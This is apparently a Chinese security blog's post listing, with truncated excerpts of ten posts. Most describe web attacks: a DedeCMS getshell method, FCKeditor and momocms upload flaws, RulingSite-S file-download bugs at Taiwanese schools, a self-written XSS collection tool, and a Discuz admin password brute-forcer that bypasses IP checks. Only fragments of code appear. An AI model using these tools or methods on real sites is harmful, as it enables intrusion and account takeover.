- 博客(10)
- 收藏
- 关注
转载 EnvironmentError:mysql config not found
MySQL for Python library在Python中也就相当于JAVA中对应MySQL的JDBC Driver 1. 首先安装mysql sudo apt-get install mysql-server 2. 安装mysql-python 下载MySQL-python-1.2.3.tar.gz(见附件),解压到指定目录。 到解压后的MySQL-
2015-07-22 18:39:11 520
转载 PHP 5.x COM functions提权漏洞的利用分析
================================nbsp; PHP是英文“超级文本预处理语言”(Hypertext Preprocessor)的缩写,是一种HTML内嵌式的语言。它可以比CGI或者Perl更快速地执行动态网页。PHP具有非常强大的功能,所有的CGI或者JavaScript的功能,PHP都能实现,支持几乎所有流行的数据库以及操作系统。 近期功能如此强大、
2015-06-24 22:16:08 2184
转载 RulingSite-S 系统漏洞 (台湾大学居多)
RulingSite-S是台湾省学校中使用比较广泛的一套cms,功能十分强(chou)大(lou)。页面简洁,布局清晰,后台操作便捷,简单上手—-、 1.任意文件下载 这个已经不新鲜了,在乌云平台也有人报告过了。代码采用ionCube加密,类似于zend。(解密呢也是相当费劲,因为我不会自己写工具,所以使用了网上流传的ionCube-decoder工具,这个工具需要注意的是只能在英文版系统下解
2015-06-24 22:12:55 3354
原创 Fckeditor <= 2.4.2 的任意文件上传漏洞代码解析
无聊,看了下fckeditor的漏洞,发现有网友已经提出Fckeditor 首先打开fckeditor\editor\filemanager\upload\php\config.php 配置fck。 我配置的信息如下 你们可以自己修改 <?php /* * FCKeditor - The text editor for Internet - http://www.fckeditor.
2015-02-20 14:51:28 2172
原创 自己写的xss利用工具
怎么说呢,我也用过xssme,感觉的确不错。还可以共享。但是我感觉就如果你自己一个人想使用,那些功能未免太过冗余。所以我写了个相当于xssme中默认模块的一个工具给大家看下。以生成文件为保存方式。大牛勿喷。 window.onload = function () { var url = "http://127.0.0.1/test/js/jsbase/xss.php"; (fun
2015-02-20 10:02:40 1027
原创 自己写的java复制任意文件代码
指定test1方法中的file();参数 即可 package File; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; public class FileOutputStreamtest1 { pub
2015-02-20 09:58:59 979
原创 自己写的java递归删除文件及文件夹
package File; import java.io.File; import java.io.IOException; import java.util.Date; public class FileTest1 { public static void main(String[] args) throws IOException { // test3(new File("D:\\xx
2015-02-16 14:32:46 396
原创 momocms代码审计
无聊时看了站长之家上有个程序挺火的,下载下来看了下。 前端的$_GET都是用intval()函数过滤了,没有什么可利用的。 后台有一处xss 在 admin\create_sub_product.php的第96行 "> 二:上传漏洞 在admin/banner_do.php 中 代码如下require("./database.php");
2015-01-31 11:59:24 768
转载 dedecms5.7/install/index.php.bak getshell方法(亲测成功)
我是从安全参考上看到这一篇文章,作者:yaseng 。 但是我自己亲自测试了一下,果然存在这个漏洞。 给大家讲下, 原文: Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.php 位install.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock 文件验证,不是还有dedecms的全局
2015-01-30 17:29:33 7613
原创 Discuz!后台密码穷举工具 无视IP验证
自己写了一个Discuz后台密码穷举工具,无视IP验证,配合社工库和弱口令字典。拿去看看吧 <?php /** Author : fengxuan Date : 2014-11-25 */ class FuckDiscuz{ public $userfile; public $passfile; public $outfile; public $url; public
2015-01-29 12:52:55 6372
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人